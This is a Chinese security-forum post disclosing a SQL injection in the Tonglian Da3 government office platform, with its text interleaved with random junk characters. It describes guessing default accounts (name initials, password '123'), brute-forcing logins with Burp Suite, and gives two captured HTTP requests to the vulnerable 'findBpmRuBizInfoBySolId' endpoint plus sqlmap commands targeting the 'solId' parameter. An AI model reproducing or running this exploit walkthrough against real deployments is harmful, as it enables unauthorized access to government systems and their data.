中国网络渗透测试联盟

标题: 同联Da3协同办公平台前台通用sql injection漏洞 [打印本页]

作者: admin    时间: 2018-10-20 20:15
标题: 同联Da3协同办公平台前台通用sql injection漏洞

* d0 n$ }, Y/ Q( V5 A
9 j3 _+ k3 H) L; L3 g+ X! B: ?

9 w' S( _" N5 \! w

[# U1 s6 h/ _! f 平台简介:- `2 z: _/ ^$ V) v

z3 _/ q$ z7 M9 y4 z

$ e) H# L5 n! ]1 ^# M  / g- W/ S' r) y! }* l9 ]$ c5 _/ d/ s2 S

& w' e/ e" m4 C5 \( x' [( A' U

' a# f& [) M' Z1 Z$ d 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
7 s- T- L- q5 E0 b5 S d: }同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ \4 T" ]4 g9 `3 E' Q" i( ^2 r同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!: r5 z# [7 C5 q2 k9 q

6 |4 F5 T4 P' t2 e! L

V4 l3 F/ A! Y( ^0 d* b+ m2 q   $ `: T2 v/ a5 D; F

]5 X- ^( X% i3 h

! s9 i: M6 [8 _5 R7 U9 E 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: 4 P* ]3 l9 \8 i$ {# [

* I: E% _! z2 C7 a. k, {

| t, ~9 y/ |2 v+ ~4 G  ( }+ D5 e' J" T% X2 c& \) Z

) d8 L2 b6 r1 S3 o" S. \. N0 g& B

# j2 p/ d: ?- s ^# r& X3 q' }$ Y http://1.1.1.1:7197/cap-aco/#(案例2-)8 x, Q5 s, {4 r5 l/ X

6 \+ L7 U+ K2 U, z2 j2 X

H2 Z) K- M* w/ {, ? http://www.XXOO.com (案例1-官网网站) 8 J* O- u. W5 X( ~- z( D. e

! G5 d* V+ f" G4 O- q5 I

4 [" v( o" S. Q. g9 ^   6 }' x7 t3 Z- v7 h8 a- V

8 D3 r4 c) x* W/ `0 |: C% W

2 e$ ]+ G$ W$ a1 V8 k3 ~; Z& P 漏洞详情: 5 [: P" ?1 H7 U; q$ |* m, C* q U

4 U+ w- ^8 z E& R6 z3 \0 ]$ Y

# l% U/ z$ z% X$ x  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试% b& d' a I% G- K) h

, b$ `$ K* {. p; {: O. G

( t8 J U' F7 u      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:/ T) h8 P3 @- l

6 F L6 F- e E7 Q

5 J) U' }! [9 [8 a9 a  : Q! t: ?6 m u5 X1 O

; `% B" h1 ?3 x, ?+ N4 @* v* P) V

+ Q3 t1 q3 D [# q, m   6 n8 Q( D+ U5 t* ^ g. T

- Z: E" P& I5 ^$ v2 S" O

; D6 [. `: r' _/ M status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:" W; C0 {# K) u: I& ?! ?% Z

; }( p. U; W. }7 Q% S8 p3 H

4 V3 x5 i$ M; {3 F/ a 1、案例1-官方网站 7 X# }" v, ^$ g" T& i C

: J `$ M& i& I

1 k/ D8 i- n6 Z7 y; q; { GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1# o6 x( m N: R+ {% D/ N

/ {4 B4 s2 ^% Q7 A5 [: Q. {

5 n2 i. m& K( m" ~% O' u Host: www.XXOO.com 8 L b* ]% x. J: G' `7 N2 H9 E0 ?

; V( [; f0 D4 L9 r M8 I

) ^. O; v) D5 U Proxy-Connection: Keep-Alive 0 G& {& Q5 O) ^+ |. J; M* |

7 q1 C. N- w8 f; x. o1 s2 M! e

0 f0 J" G5 P7 z+ W Accept: application/json, text/javascript, */*; q=0.01% J+ |% i3 e# b0 U! o4 |. j

; Z: g; p# S4 F" P* o# ~

) C0 d, P# q9 _9 m Accept-Language: zh-CN4 h/ h! y2 t& J, y6 e/ I% K' ~

1 I* o/ M( ]. ?# k8 e9 h0 s

1 H) G8 D1 ^7 U: H5 R% U' } Content-Type: application/json6 F# M I; c" Z! F, [

1 q: G$ p! U0 V) w; J& @

; B- V1 o+ h. \" M User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko" b: P" {. d5 V

; M0 A! o4 h$ a- r

( W* B J" T* x5 {* f0 E X-Requested-With: XMLHttpRequest' ]* P) p; o4 {

; u R2 W, Z9 G9 \# t6 y! P

2 f6 p. u( U" B: U Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M0022 I& J+ }8 i1 p# t

. c4 b, h; t# K- {

- L, ]* b+ G+ B2 }4 p% P Accept-Encoding: gzip, deflate, sdch! o( D2 v- ^. `/ H

2 g2 u8 i9 y& o

. j3 G4 b2 i* f; A& W Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e. V; t* K: Q# \

. E; k, w: \, p; \) u8 n0 [

1 w$ \9 |# i% L( d/ u 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: / V/ K! N- \& H. Z* X' q0 r# f

* k5 f* q, q9 ~! n0 ~) i; t Z

3 a2 Y8 h2 t+ C" J   + e0 |9 \$ ]+ |; _; h( C+ O3 C

& w) b2 y5 l$ U

. Z+ Y- R- S( U G' s   ' C* M- V6 x; ?& J }& B: v

& Q3 X% L) D6 S4 b0 d

; w* U3 D- f- y" [. ^   I6 `- j) \% b( J

7 X/ y- M8 x& p1 X4 X$ V

* Q$ N: J7 d/ c9 G: L   4 W! ?$ I ]; d" v6 W" t! ?6 _

4 A. ?! c/ Z# C6 E( f

6 E& D% X" ^2 ^7 ~9 i   : A+ Y/ X* u, _2 }! d: E2 ^

0 i: H5 M; h5 ?* X' n# R5 F

0 |: d1 d2 q! {: A$ S# K 2、案例2-某天河云平台 # @# `( d _: y% S3 `: m

+ F4 \3 v. c+ S6 D0 e

% u$ `, h4 i0 E F9 @ GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1# X* M+ j% V3 s

9 f7 }1 A2 j4 `5 r2 x

& Z% T; m+ i7 J3 `" b Host: 1.1.1.:71975 v' g, X0 B+ `

( {) u: t& k' ` Y

$ Y1 W3 A+ t0 @ Accept: application/json, text/javascript, */*; q=0.016 m$ P$ s# S0 n" c

' a. ]" u# w$ U; a+ K" C

0 @3 I1 c" [: Z. q! R. x. d X-Requested-With: XMLHttpRequest % f- m! |; t. \9 Z# F6 f3 ]6 R, J- K

8 G9 ]6 j8 N+ P, g

^: O. s8 f5 U( ` User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 9 }8 T- V& X$ |) l" w8 u8 \# i

& C9 N# n3 h* P+ K

) V& c' s( E0 n: n0 R S Content-Type: application/json 0 ^/ p! I+ X- t$ n9 Q+ d

; m8 h' X- u9 t# m- U3 y

0 F2 o. d$ \3 ]1 w" f Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008- F8 T4 t0 g. m7 q

" e- H' v' m$ \

( c* x0 ^1 [' S; k Accept-Language: zh-CN,zh;q=0.85 P9 d- P2 Y& s# I1 X

$ T+ {2 a! l) ?8 k$ ~- p/ L: O

' r8 w7 i; R6 X& P; ~! j Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 ! a1 G& p/ E0 c1 ?1 X4 \

; m+ \3 F2 u! J. q. A

, r) b. ?9 i& b9 `/ @* W# H$ P, X Connection: close # E! s( X$ X) C1 y# }7 m3 j7 D/ I

3 X/ A2 J+ P L0 Q/ x! G6 [3 j

' N; u$ B$ |* N' B9 ? 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 7 B* a$ U1 f2 ?6 C4 U

$ M+ a7 m9 w( I9 \& C+ Z

' p# O( n3 t/ ]8 C: P$ b2 H4 u   % C H$ p+ d* z

5 h5 ]& O0 Q0 _* @2 o7 X

- t7 L# N3 Z" z- }
" r/ t& i" f5 K* \. F: p- |






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2